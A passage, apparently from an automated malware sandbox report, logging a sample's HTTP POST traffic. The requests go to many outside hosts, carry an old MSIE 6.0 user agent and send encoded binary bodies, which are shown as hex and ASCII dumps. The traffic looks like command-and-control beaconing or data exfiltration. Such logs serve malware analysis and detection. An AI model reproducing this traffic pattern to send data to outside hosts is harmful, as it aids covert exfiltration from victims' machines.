58 32 34 5a 72 4f 73 6e 65 7a 52 75 59 4e 70 53 33 55 4a 79 66 4f 46 75 75 63 67 35 6b 32 72 63 38 64 61 36 47 79 34 75 64 68 6b 6c 44 69 6d 6d 78 58 2b 42 44 61 2f 46 46 63 35 59 43 6f 64 44 67 72 48 43 74 2b 67 42 59 37 7a 7a 59 78 56 66 36 34 6c 48 39 69 6e 4c 61 58 6c 76 4e 2f 52 69 37 42 72 74 74 39 54 2f 6e 6b 4a 77 39 37 44 39 48 52 2f 70 37 38 78 32 49 76 61 47 6d 57 51 4b 72 58 35 75 52 34 6a 4d 74 6d 64 44 61 73 7a 56 74 73 49 76 67 54 5a 44 79 4c 35 63 65 77 78 47 79 50 72 4f 2b 4d 6e 7a 47 33 52 61 34 31 50 48 63 47 39 49 52 62 6a 61 47 6f 6d 58 6d 66 36 66 6b 4e 6e 65 76 4e 73 47 6c 74 32 43 69 5a 71 4d 62 6b 31 41 56 5a 42 51 71 70 78 77 42 48 2b 5a 44 44 48 30 58 64 74 41 66 73 37 73 78 6b 4b 76 68 4e 73 52 2f 70 7a 48 36 75 43 78 76 57 43 73 2b 39 4a 42 72 63 6a 6c 37 6b 71 70 75 6f 6b 6a 2b 78 77 70 68 62 57 4a 41 35 36 67 66 47 6e 4b 45 36 78 33 75 63 69 57 30 41 47 35 6c 79 32 70 62 64 58 65 2b 45 6e 73 79 64 44 36 57 48 39 49 64 4c 58 37 38 6c 77 56 53 5a 6e 37 4e 4e 74 36 53 61 59 5a 78 69 4b 6d 31 71 34 57 71 6b 4d 58 58 6f 38 72 45 6d 42 30 6b 7a Data Ascii: zWVpoe1dTJRSxB+D5CbhXaZUU3bbi3/pccUATTZ1V9YrgxO3pGWNjyMLL8sMRLpTNb0/ZT4QokCi+RTBjqjKUR5HeFAnj3w/GfTPJD3JYbmskLD3MZ8+WNyFNVV3hjcLtkwPfV9bRrbI+OFtAxEK/yNy7wfXBDq/vTJGzEBhR3CWKdJEMr7sdPDZLJWWLHsyBGX24ZrOsnezRuYNpS3UJyfOFuucg5k2rc8da6Gy4udhklDimmxX+BDa/FFc5YCodDgrHCt+gBY7zzYxVf64lH9inLaXlvN/Ri7Brtt9T/nkJw97D9HR/p78x2IvaGmWQKrX5uR4jMtmdDaszVtsIvgTZDyL5cewxGyPrO+MnzG3Ra41PHcG9IRbjaGomXmf6fkNnevNsGlt2CiZqMbk1AVZBQqpxwBH+ZDDH0XdtAfs7sxkKvhNsR/pzH6uCxvWCs+9JBrcjl7kqpuokj+xwphbWJA56gfGnKE6x3uciW0AG5ly2pbdXe+EnsydD6WH9IdLX78lwVSZn7NNt6SaYZxiKm1q4WqkMXXo8rEmB0kz
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 47 6d 74 39 6f 7a 4a 76 54 4a 51 35 36 67 4e 62 5a 59 53 41 46 44 57 4c 71 33 59 43 79 2b 4d 42 68 73 67 38 38 77 67 49 62 73 66 76 4d 56 4b 70 66 67 56 63 6f 33 6d 59 4c 4a 45 7a 39 34 57 68 56 66 49 49 78 51 50 41 71 76 6a 36 30 77 50 39 57 43 6e 69 53 4d 46 4d 42 69 6c 4e 30 69 76 77 32 70 6f 55 33 42 55 37 57 46 2b 53 63 71 7a 2f 55 50 39 76 49 31 4d 43 61 2b 61 45 7a 70 77 44 77 53 53 65 4d 75 38 71 31 4e 6d 65 31 73 62 44 41 68 37 57 6f 50 55 70 37 6f 2b 47 6d 47 4c 4d 50 6c 73 32 68 70 53 64 6d 54 62 54 70 4b 54 79 70 6d 49 47 36 4e 76 51 34 58 64 4b 74 62 63 58 6f 43 33 4c 70 34 63 43 33 79 47 70 5a 73 61 37 64 4a 77 34 45 59 73 67 63 79 7a 53 5a 42 62 44 63 51 57 71 56 6f 33 4e 54 4c 46 6c 55 61 54 6f 34 37 77 6d 68 47 58 63 71 51 37 73 51 34 31 70 45 48 62 31 47 76 33 73 78 50 35 71 73 56 6c 69 2f 48 63 44 63 52 69 46 39 63 74 45 7a 61 68 2b 6e 38 79 75 37 66 41 62 4e 54 2f 71 59 33 4f 6a 55 38 36 78 62 73 47 4b 39 75 42 46 5a 32 38 34 2b 59 6d 34 6a 36 50 71 30 69 5a 54 48 4e 56 67 61 2f 4a 62 6b 30 77 59 4e 6b 4f 4d 2f 6f 39 6b 53 4c 63 2b 5a 68 51 63 77 38 71 55 7a 6a 79 2b 6b 59 4a 6d 6b 4c 4c 6f 77 52 44 65 55 43 50 72 45 36 49 32 49 45 74 49 78 6f 48 69 56 48 63 71 50 70 37 64 50 36 6d 73 56 33 72 42 57 77 5a 4f 6a 73 77 6e 67 6a 31 45 50 30 59 33 33 68 4d 68 77 70 57 73 79 58 66 57 37 6a 58 41 72 67 4f 41 64 5a 74 34 62 63 38 62 69 2f 42 4d 4e 55 49 6a 47 38 35 66 30 44 70 4a 2b 6c 74 6d 31 53 34 2b 52 35 30 49 39 76 53 30 70 35 46 76 41 34 6f 6b 6f 53 52 7a 72 73 73 59 36 2b 33 78 48 55 33 45 54 4c 78 6d 74 6e 4d 64 6d 34 38 6f 5a 69 67 79 33 34 77 51 68 73 30 6c 4a 59 72 52 6b 49 33 57 77 77 45 6d 7a 4f 31 49 65 39 2b 68 74 4d 73 3d Data Ascii: Gmt9ozJvTJQ56gNbZYSAFDWLq3YCy+MBhsg88wgIbsfvMVKpfgVco3mYLJEz94WhVfIIxQPAqvj60wP9WCniSMFMBilN0ivw2poU3BU7WF+Scqz/UP9vI1MCa+aEzpwDwSSeMu8q1Nme1sbDAh7WoPUp7o+GmGLMPls2hpSdmTbTpKTypmIG6NvQ4XdKtbcXoC3Lp4cC3yGpZsa7dJw4EYsgcyzSZBbDcQWqVo3NTLFlUaTo47wmhGXcqQ7sQ41pEHb1Gv3sxP5qsVli/HcDcRiF9ctEzah+n8yu7fAbNT/qY3OjU86xbsGK9uBFZ284+Ym4j6Pq0iZTHNVga/Jbk0wYNkOM/o9kSLc+ZhQcw8qUzjy+kYJmkLLowRDeUCPrE6I2IEtIxoHiVHcqPp7dP6msV3rBWwZOjswngj1EP0Y33hMhwpWsyXfW7jXArgOAdZt4bc8bi/BMNUIjG85f0DpJ+ltm1S4+R50I9vS0p5FvA4okoSRzrssY6+3xHU3ETLxmtnMdm48oZigy34wQhs0lJYrRkI3WwwEmzO1Ie9+htMs=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 69 6f 59 56 6f 6f 4e 6a 54 4a 51 69 41 35 68 4b 69 6a 50 42 36 36 7a 73 4b 43 73 70 61 49 45 4c 5a 30 48 7a 4f 78 72 44 75 57 54 68 4a 4c 65 77 79 42 62 42 7a 58 55 6e 4a 37 6d 78 7a 73 62 35 7a 59 75 57 66 39 41 66 6f 4c 4e 68 6c 5a 67 78 68 6c 45 39 39 6c 5a 47 69 62 69 54 2f 63 62 41 64 49 32 62 48 47 32 38 6a 43 54 68 6b 56 62 68 4b 35 66 42 4f 76 45 2f 39 72 36 69 4b 39 42 63 33 44 63 59 77 6c 4d 74 38 6c 72 47 61 7a 71 6d 59 6c 44 4c 58 36 78 69 61 51 61 30 79 74 74 66 72 77 4c 63 75 41 31 76 6c 49 43 4f 31 4f 35 2f 79 70 49 6f 4d 7a 54 72 31 78 47 6d 7a 57 58 66 2f 6e 6c 7a 4a 77 76 54 31 65 4f 4d 64 55 6e 36 70 39 58 38 76 68 51 64 6b 55 44 58 4a 7a 4f 58 39 2b 45 69 74 45 73 46 56 30 52 4c 46 7a 4d 57 42 6d 31 69 55 50 6c 49 61 30 4f 35 4c 4e 4b 5a 73 64 62 4e 70 6b 6d 47 4b 4e 6e 44 70 6f 42 76 46 43 50 6d 6b 6f 37 69 62 39 7a 49 48 56 72 48 47 31 59 77 53 36 59 44 43 59 32 2f 74 2b 54 50 6c 55 4a 4b 51 4b 2b 50 45 4f 75 56 6e 7a 78 57 31 78 68 75 32 6c 68 75 32 45 6b 74 4f 4b 57 65 31 49 4a 38 5a 6a 48 33 4e 59 6b 33 56 42 4c 78 39 76 47 48 32 76 69 4b 2f 74 63 2b 75 66 64 54 6e 35 38 39 51 4d 68 66 63 66 4c 41 4a 64 35 44 75 79 32 7a 50 4b 6d 44 7a 45 41 2b 76 36 4e 62 41 73 75 58 59 78 41 57 55 48 47 6c 6a 63 36 50 6f 6f 6d 6a 4a 59 66 5a 69 45 4c 69 77 54 4b 6e 58 63 70 41 30 61 42 41 71 67 4c 35 4d 41 6c 69 50 37 4f 64 50 33 41 7a 38 4b 53 6c 38 69 74 50 31 32 2b 4a 69 6f 6c 79 41 78 69 32 2f 6e 61 54 70 42 2f 41 31 59 6c 64 78 6a 46 68 6a 46 58 38 66 45 68 72 6e 49 6b 48 49 31 58 65 67 67 52 77 45 4d 39 74 63 58 4e 30 45 41 55 4b 38 71 73 45 64 50 55 33 63 42 44 53 4a 7a 79 71 6d 70 77 73 64 53 74 35 50 6c 62 51 55 66 4c 4c 4e 39 65 59 56 51 6b 3d Data Ascii: ioYVooNjTJQiA5hKijPB66zsKCspaIELZ0HzOxrDuWThJLewyBbBzXUnJ7mxzsb5zYuWf9AfoLNhlZgxhlE99lZGibiT/cbAdI2bHG28jCThkVbhK5fBOvE/9r6iK9Bc3DcYwlMt8lrGazqmYlDLX6xiaQa0yttfrwLcuA1vlICO1O5/ypIoMzTr1xGmzWXf/nlzJwvT1eOMdUn6p9X8vhQdkUDXJzOX9+EitEsFV0RLFzMWBm1iUPlIa0O5LNKZsdbNpkmGKNnDpoBvFCPmko7ib9zIHVrHG1YwS6YDCY2/t+TPlUJKQK+PEOuVnzxW1xhu2lhu2EktOKWe1IJ8ZjH3NYk3VBLx9vGH2viK/tc+ufdTn589QMhfcfLAJd5Duy2zPKmDzEA+v6NbAsuXYxAWUHGljc6PoomjJYfZiELiwTKnXcpA0aBAqgL5MAliP7OdP3Az8KSl8itP12+JiolyAxi2/naTpB/A1YldxjFhjFX8fEhrnIkHI1XeggRwEM9tcXN0EAUK8qsEdPU3cBDSJzyqmpwsdSt5PlbQUfLLN9eYVQk=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 43 58 54 31 39 72 75 44 30 4d 79 2b 6f 4b 6a 4b 55 69 58 46 6c 4b 52 52 4e 67 72 42 6d 4b 47 52 48 77 6c 55 71 6c 36 53 73 65 35 39 45 59 4c 6b 58 71 35 46 64 64 32 7a 67 79 50 42 66 6b 68 6b 51 44 37 6e 43 61 4e 56 71 6c 71 67 73 69 62 39 6b 38 52 71 4d 68 74 65 52 33 63 44 4e 53 6a 65 2b 30 61 68 4b 74 4b 32 57 6b 50 51 69 47 37 58 78 34 44 4b 4e 73 42 71 66 6e 2f 74 34 48 71 72 58 72 67 6e 73 43 49 30 66 4e 33 2b 4e 2f 4d 34 2b 6c 54 61 65 61 61 76 62 70 6a 65 67 41 6a 77 33 64 6d 71 38 68 52 63 42 77 48 37 4f 43 4d 31 74 76 6f 70 4c 39 63 33 75 78 63 57 70 66 79 30 71 46 44 31 69 50 36 72 42 54 6d 37 34 54 66 34 68 71 59 37 4e 31 52 6f 52 6a 52 64 43 33 76 65 4a 43 68 39 69 73 49 70 41 36 59 59 66 37 66 58 79 50 37 63 74 4c 59 6e 72 6e 39 6b 5a 65 47 70 62 44 59 4d 37 6f 31 31 34 33 31 41 72 37 4b 36 72 4c 5a 4d 66 55 2b 65 63 6f 5a 4b 77 77 37 71 38 51 69 49 78 55 61 55 66 4e 35 4f 63 6f 47 79 33 54 6d 65 45 2b 57 70 48 54 6a 61 7a 59 56 58 64 31 6f 45 74 4f 6c 45 30 76 65 71 54 78 71 53 67 53 4a 4a 69 6c 72 57 58 32 78 32 45 4d 66 38 33 43 43 6d 64 4c 66 37 72 55 53 79 30 53 58 4b 48 63 79 56 56 79 48 55 68 63 2b 43 6a 69 33 33 63 52 58 4b 4d 61 4a 77 57 53 54 41 54 30 2f 45 6d 65 4e 76 6e 38 48 50 30 6e 5a 69 4e 38 68 38 51 43 64 61 4a 75 79 78 50 31 73 65 78 2f 33 66 71 58 42 35 4f 78 56 42 67 4a 4a 50 6d 76 55 32 78 79 6d 30 48 51 52 32 64 53 56 50 66 78 38 46 50 6e 38 69 62 73 47 75 6b 4a 48 56 6a 59 73 4f 58 39 2b 75 75 41 78 53 71 65 45 67 6f 68 63 57 4c 6a 71 4d 77 7a 41 42 4b 37 64 7a 6d 6e 58 6c 53 50 73 6b 49 77 4d 79 50 58 66 7a 4e 71 64 58 74 63 66 59 2f 78 43 4f 79 49 51 70 59 4b 7a 59 2b 4e 30 56 46 4b 6d 4c 4a 42 55 3d Data Ascii: CXT19ruD0My+oKjKUiXFlKRRNgrBmKGRHwlUql6Sse59EYLkXq5Fdd2zgyPBfkhkQD7nCaNVqlqgsib9k8RqMhteR3cDNSje+0ahKtK2WkPQiG7Xx4DKNsBqfn/t4HqrXrgnsCI0fN3+N/M4+lTaeaavbpjegAjw3dmq8hRcBwH7OCM1tvopL9c3uxcWpfy0qFD1iP6rBTm74Tf4hqY7N1RoRjRdC3veJCh9isIpA6YYf7fXyP7ctLYnrn9kZeGpbDYM7o11431Ar7K6rLZMfU+ecoZKww7q8QiIxUaUfN5OcoGy3TmeE+WpHTjazYVXd1oEtOlE0veqTxqSgSJJilrWX2x2EMf83CCmdLf7rUSy0SXKHcyVVyHUhc+Cji33cRXKMaJwWSTAT0/EmeNvn8HP0nZiN8h8QCdaJuyxP1sex/3fqXB5OxVBgJJPmvU2xym0HQR2dSVPfx8FPn8ibsGukJHVjYsOX9+uuAxSqeEgohcWLjqMwzABK7dzmnXlSPskIwMyPXfzNqdXtcfY/xCOyIQpYKzY+N0VFKmLJBU=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 44 37 63 6f 4c 53 65 49 59 5a 51 72 2b 59 79 6c 31 6d 64 78 37 66 41 4d 4b 5a 4b 64 30 77 46 36 53 77 61 42 63 66 38 32 50 66 64 67 63 33 56 58 79 74 35 49 48 51 67 4d 2b 41 51 56 4f 6c 50 33 4f 37 49 38 52 49 64 77 70 63 79 4d 59 6f 63 46 32 56 65 75 65 36 4b 6a 4c 5a 44 6a 51 49 72 36 6e 75 49 36 42 35 6f 48 58 41 72 6e 77 56 46 59 51 38 36 76 59 45 55 70 4c 35 4f 6c 2f 59 76 6e 36 36 4a 49 4a 6a 58 4d 54 77 69 44 45 7a 76 2f 49 55 6f 67 71 2b 38 31 36 48 73 6a 2f 4a 75 49 64 33 48 61 34 41 65 68 67 43 44 52 51 53 61 61 61 6f 4c 71 32 78 37 33 6c 31 32 51 37 6c 64 38 34 37 33 74 43 41 47 70 74 35 75 5a 4b 38 68 47 4c 43 55 59 41 33 43 69 67 47 71 55 6e 55 65 36 36 4f 4c 4a 44 32 68 64 57 31 70 35 43 61 47 51 6e 4b 78 36 30 6f 66 7a 45 76 73 46 51 62 38 6e 6c 65 78 7a 55 47 37 70 75 65 56 57 76 6d 35 31 6b 70 4d 36 52 4b 38 63 6e 44 64 45 54 32 34 4f 4b 33 2f 38 4a 2f 65 38 49 55 32 39 39 6a 69 41 46 54 35 78 51 7a 2f 74 73 31 4f 35 58 49 52 39 78 6d 42 30 37 34 65 6f 2f 62 4f 76 62 75 52 7a 68 6d 33 54 7a 73 4d 72 45 4b 6b 4a 62 6e 43 50 2b 41 7a 50 76 69 6c 62 54 79 6e 32 64 4f 47 41 43 48 36 50 71 68 56 73 44 35 44 63 46 6e 4d 6e 51 61 6e 48 73 55 66 75 57 66 73 44 55 63 76 43 65 37 35 61 31 39 4c 78 66 7a 72 6b 69 74 6f 4c 74 6d 52 31 59 47 4c 6a 42 54 79 52 67 36 70 78 69 64 4e 4f 30 2f 34 6d 77 66 34 61 36 32 38 6d 46 43 5a 61 71 42 4d 37 2f 67 6d 72 42 5a 45 79 7a 39 56 50 69 44 5a 50 6f 74 37 62 38 35 6a 39 58 2b 6e 7a 6b 4e 43 69 37 58 4b 37 34 51 4a 51 38 70 74 6c 73 63 4a 6b 50 6c 72 37 79 67 59 74 2f 5a 4f 5a 2b 52 66 6c 38 4b 55 36 62 73 47 75 4a 69 35 33 41 79 61 4e 2b 43 42 4d 37 75 31 50 67 48 39 62 6c 30 66 72 Data Ascii: D7coLSeIYZQr+Yyl1mdx7fAMKZKd0wF6SwaBcf82Pfdgc3VXyt5IHQgM+AQVOlP3O7I8RIdwpcyMYocF2Veue6KjLZDjQIr6nuI6B5oHXArnwVFYQ86vYEUpL5Ol/Yvn66JIJjXMTwiDEzv/IUogq+816Hsj/JuId3Ha4AehgCDRQSaaaoLq2x73l12Q7ld8473tCAGpt5uZK8hGLCUYA3CigGqUnUe66OLJD2hdW1p5CaGQnKx60ofzEvsFQb8nlexzUG7pueVWvm51kpM6RK8cnDdET24OK3/8J/e8IU299jiAFT5xQz/ts1O5XIR9xmB074eo/bOvbuRzhm3TzsMrEKkJbnCP+AzPvilbTyn2dOGACH6PqhVsD5DcFnMnQanHsUfuWfsDUcvCe75a19LxfzrkitoLtmR1YGLjBTyRg6pxidNO0/4mwf4a628mFCZaqBM7/gmrBZEyz9VPiDZPot7b85j9X+nzkNCi7XK74QJQ8ptlscJkPlr7ygYt/ZOZ+Rfl8KU6bsGuJi53AyaN+CBM7u1PgH9bl0fr
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 55 6f 30 57 4c 5a 47 48 59 5a 54 57 57 4b 74 75 4d 4a 75 50 33 75 72 42 49 76 64 50 34 44 58 46 56 56 63 54 35 4a 78 73 6a 65 63 73 4c 56 30 6d 36 73 56 55 4e 6f 34 73 38 75 62 67 45 32 54 33 48 59 48 4f 72 6c 34 31 4f 36 62 69 74 76 66 6e 58 75 6d 6e 30 56 72 53 75 48 79 36 2b 68 79 4a 53 73 45 73 66 4a 4f 31 65 52 4e 66 31 42 4d 32 62 67 52 32 59 43 55 39 43 51 65 6e 47 47 42 65 6f 32 72 30 55 50 54 53 76 75 39 43 44 6c 38 6d 69 73 65 53 53 42 58 32 4b 34 34 2b 58 37 63 78 75 5a 62 39 54 45 72 2f 30 63 6a 6e 30 36 57 52 46 67 43 2f 79 48 6d 6e 6b 4f 50 5a 4b 5a 31 31 37 4f 34 58 55 67 30 70 4f 59 4a 30 2f 68 35 5a 71 52 62 6f 51 5a 47 76 38 77 64 67 45 44 50 77 54 2f 4e 41 79 49 53 71 55 77 69 43 65 73 43 78 68 69 53 6d 54 42 4f 2b 64 6f 65 35 46 6e 68 6f 33 54 74 2b 74 51 39 67 7a 7a 79 68 73 38 59 44 57 52 55 63 79 71 37 66 36 36 55 4c 63 4b 53 38 72 2b 77 54 69 73 44 6f 54 54 6e 6e 4f 55 68 7a 6b 64 38 67 6f 4f 4e 71 4c 71 45 6e 57 33 6c 53 35 30 62 74 67 6b 4d 48 69 32 4c 75 70 69 4a 35 2b 49 64 6c 42 6a 4b 6d 63 73 31 59 66 72 72 33 31 33 39 42 4b 31 67 41 74 73 6d 4d 42 63 2f 56 49 6d 36 61 43 65 5a 4f 6a 59 79 68 6c 43 76 4c 78 37 45 62 57 39 58 64 43 71 2b 70 35 4c 4e 73 50 68 58 65 4a 30 53 50 33 64 72 75 34 6e 74 59 32 7a 66 71 6e 5a 50 77 63 36 69 6d 61 7a 56 71 6c 58 39 66 50 4a 58 34 4e 4f 38 43 4e 39 47 43 62 64 51 49 77 62 2b 53 72 46 65 76 6a 77 59 4f 57 64 4d 33 4f 31 71 41 62 52 58 47 5a 72 75 6f 62 73 5a 6d 46 69 30 71 78 35 72 44 41 58 61 59 30 55 30 70 38 74 48 33 32 44 47 37 64 74 79 30 56 54 34 73 66 47 6a 43 70 32 43 33 37 68 4e 54 47 4a 52 68 6d 4d 67 45 37 67 55 6d 4f 4b 53 6c 4c 61 42 6f 47 48 6e 44 2b 37 6b 3d Data Ascii: Uo0WLZGHYZTWWKtuMJuP3urBIvdP4DXFVVcT5JxsjecsLV0m6sVUNo4s8ubgE2T3HYHOrl41O6bitvfnXumn0VrSuHy6+hyJSsEsfJO1eRNf1BM2bgR2YCU9CQenGGBeo2r0UPTSvu9CDl8miseSSBX2K44+X7cxuZb9TEr/0cjn06WRFgC/yHmnkOPZKZ117O4XUg0pOYJ0/h5ZqRboQZGv8wdgEDPwT/NAyISqUwiCesCxhiSmTBO+doe5Fnho3Tt+tQ9gzzyhs8YDWRUcyq7f66ULcKS8r+wTisDoTTnnOUhzkd8goONqLqEnW3lS50btgkMHi2LupiJ5+IdlBjKmcs1Yfrr3139BK1gAtsmMBc/VIm6aCeZOjYyhlCvLx7EbW9XdCq+p5LNsPhXeJ0SP3dru4ntY2zfqnZPwc6imazVqlX9fPJX4NO8CN9GCbdQIwb+SrFevjwYOWdM3O1qAbRXGZruobsZmFi0qx5rDAXaY0U0p8tH32DG7dty0VT4sfGjCp2C37hNTGJRhmMgE7gUmOKSlLaBoGHnD+7k=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 53 79 4e 54 72 46 79 70 5a 5a 52 67 48 67 64 4c 68 7a 55 50 30 65 38 45 61 68 64 30 53 64 4a 59 55 4f 44 63 76 50 69 34 57 61 47 54 54 36 67 64 74 48 6a 59 2b 6c 4a 4d 44 79 47 7a 44 4e 4f 43 4f 4c 4e 49 56 47 30 79 52 59 4d 46 73 32 79 31 46 6b 66 4a 6f 48 6f 6d 78 47 6d 7a 54 50 33 6f 34 4a 58 44 6e 4e 34 31 6a 51 77 39 6d 35 44 4f 78 65 70 62 76 4e 77 56 6c 38 42 4a 54 62 69 36 66 68 66 50 55 2b 6d 4f 30 4e 4a 5a 75 44 41 70 6a 53 54 57 68 36 79 68 39 36 70 41 5a 49 4d 42 58 42 6a 58 67 6c 4e 63 7a 6d 51 6a 78 63 65 62 39 51 6c 73 76 52 37 4a 32 67 54 2f 2f 6b 53 52 31 56 63 70 66 44 54 35 77 42 54 4e 59 6d 72 56 31 35 6d 73 58 79 2b 38 76 79 4d 52 70 4f 79 72 75 37 62 33 2b 62 6e 62 43 33 68 73 70 57 55 76 4f 68 36 42 79 6a 34 49 2f 54 54 45 2b 52 46 33 4c 74 72 76 65 52 6b 73 55 62 31 4d 44 54 72 78 42 37 4c 31 36 6b 37 62 39 71 53 30 48 65 7a 7a 7a 4c 76 2f 2f 32 44 64 4e 74 35 71 6a 30 4e 69 58 39 50 58 78 6e 56 30 39 69 35 50 49 50 47 2b 67 72 36 6f 76 7a 69 4d 48 52 6e 7a 48 6c 58 2f 4d 7a 39 59 68 4c 76 63 63 6a 6c 30 4f 69 50 65 77 4b 77 30 67 6a 34 70 37 6f 45 75 56 44 36 62 64 77 57 62 72 50 42 2b 59 4f 61 62 4d 66 48 5a 44 62 52 65 65 50 53 6d 57 64 52 32 46 39 64 54 47 61 6f 4e 59 51 45 74 50 72 5a 2f 4e 61 5a 75 48 56 5a 42 46 47 6e 2f 73 58 70 50 53 4d 4a 51 6b 42 35 4d 46 45 6b 55 73 2b 76 33 64 30 37 37 65 33 47 63 52 52 4d 4e 39 32 6b 49 6c 53 6f 47 38 7a 53 73 4c 62 34 66 44 52 67 4a 45 53 32 45 6a 52 46 79 51 4a 75 74 63 71 6f 35 66 37 54 53 46 61 4d 64 4d 71 66 4f 37 35 4b 36 57 51 52 76 51 30 44 7a 61 4c 6c 52 54 2f 6e 4c 4a 54 48 2f 31 2f 67 4d 37 57 49 4b 35 5a 4a 74 7a 76 79 77 49 36 6e 6a 6d 52 76 67 66 4b 65 6c 31 64 6a 39 6d 57 4c 34 53 48 55 54 70 4c 56 2f Data Ascii: SyNTrFypZZRgHgdLhzUP0e8Eahd0SdJYUODcvPi4WaGTT6gdtHjY+lJMDyGzDNOCOLNIVG0yRYMFs2y1FkfJoHomxGmzTP3o4JXDnN41jQw9m5DOxepbvNwVl8BJTbi6fhfPU+mO0NJZuDApjSTWh6yh96pAZIMBXBjXglNczmQjxceb9QlsvR7J2gT//kSR1VcpfDT5wBTNYmrV15msXy+8vyMRpOyru7b3+bnbC3hspWUvOh6Byj4I/TTE+RF3LtrveRksUb1MDTrxB7L16k7b9qS0HezzzLv//2DdNt5qj0NiX9PXxnV09i5PIPG+gr6ovziMHRnzHlX/Mz9YhLvccjl0OiPewKw0gj4p7oEuVD6bdwWbrPB+YOabMfHZDbReePSmWdR2F9dTGaoNYQEtPrZ/NaZuHVZBFGn/sXpPSMJQkB5MFEkUs+v3d077e3GcRRMN92kIlSoG8zSsLb4fDRgJES2EjRFyQJutcqo5f7TSFaMdMqfO75K6WQRvQ0DzaLlRT/nLJTH/1/gM7WIK5ZJtzvywI6njmRvgfKel1dj9mWL4SHUTpLV/
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 75 53 6c 4f 52 53 57 68 61 70 51 77 71 58 76 56 7a 4f 43 71 2f 70 37 55 74 53 5a 7a 57 37 57 63 4b 56 68 44 61 6f 6d 2f 37 56 70 71 6c 2b 74 49 69 4c 6f 7a 6e 6d 41 4f 6f 56 71 30 6d 38 39 77 68 45 34 37 57 37 6d 6a 78 5a 55 65 49 39 38 6d 36 4d 6f 69 4c 53 72 48 4d 68 72 33 64 49 76 61 36 55 36 39 74 77 54 70 6d 65 62 37 47 76 50 38 79 75 42 66 33 64 4e 71 35 2f 61 73 47 4d 46 75 6f 6e 41 34 44 35 36 63 79 68 66 73 56 66 42 53 50 6d 6f 32 2b 4a 70 4d 4f 57 4a 43 6e 6c 6e 76 54 58 38 45 39 76 67 43 46 76 59 6c 6a 7a 39 75 2f 55 42 64 4c 30 32 64 5a 4a 51 54 59 77 2b 53 5a 30 59 55 2b 62 34 63 61 57 32 47 4d 64 4d 48 77 41 52 66 4c 6a 72 6e 65 58 5a 55 42 45 31 75 41 57 4b 38 75 2f 67 74 63 47 77 4d 43 43 63 39 53 32 51 6d 79 57 6a 4a 4d 53 63 5a 6e 78 7a 78 43 41 41 32 51 4f 56 74 35 62 6b 6b 58 50 6b 6c 74 57 59 36 52 39 62 78 4a 6f 6e 59 7a 61 4c 54 76 57 32 61 76 4e 2f 75 76 78 67 79 74 77 4d 39 6c 73 35 75 54 46 33 59 2b 41 42 6b 69 32 68 45 47 2b 65 33 5a 61 76 47 36 44 67 35 43 6d 63 2b 4e 4f 6f 6d 74 48 5a 62 43 75 53 61 46 5a 62 6b 73 4d 43 4b 51 42 63 68 5a 66 66 36 62 6a 44 6b 43 49 32 48 70 34 4a 7a 6e 69 6c 5a 76 52 54 33 69 48 59 74 2f 37 30 7a 46 6f 62 2f 45 50 70 63 54 6b 71 57 42 2b 35 70 53 49 47 7a 73 6f 49 70 42 43 2b 4c 4f 58 54 33 2f 72 75 42 76 45 76 36 43 55 70 39 58 4b 4e 4c 69 30 53 52 57 7a 4b 4d 47 44 7a 64 6e 51 6a 77 54 56 79 6b 7a 34 56 48 6d 71 52 39 43 61 48 62 6f 73 48 54 68 4a 47 71 75 31 42 4c 38 34 59 36 32 6e 74 48 52 55 77 63 64 68 4a 6b 36 36 63 49 65 41 39 61 68 34 35 6e 41 5a 32 64 78 30 73 38 79 76 76 6d 53 51 31 31 6d 50 75 6c 6d 49 31 61 55 4d 4e 6a 61 54 39 4f 56 55 43 2b 55 48 50 76 43 59 53 77 6a 51 36 7a 2b 30 30 77 69 50 52 50 6d 6e 5a 53 7a 66 4a 55 44 7a 67 53 75 37 64 6c 61 67 3d 3d Data Ascii: 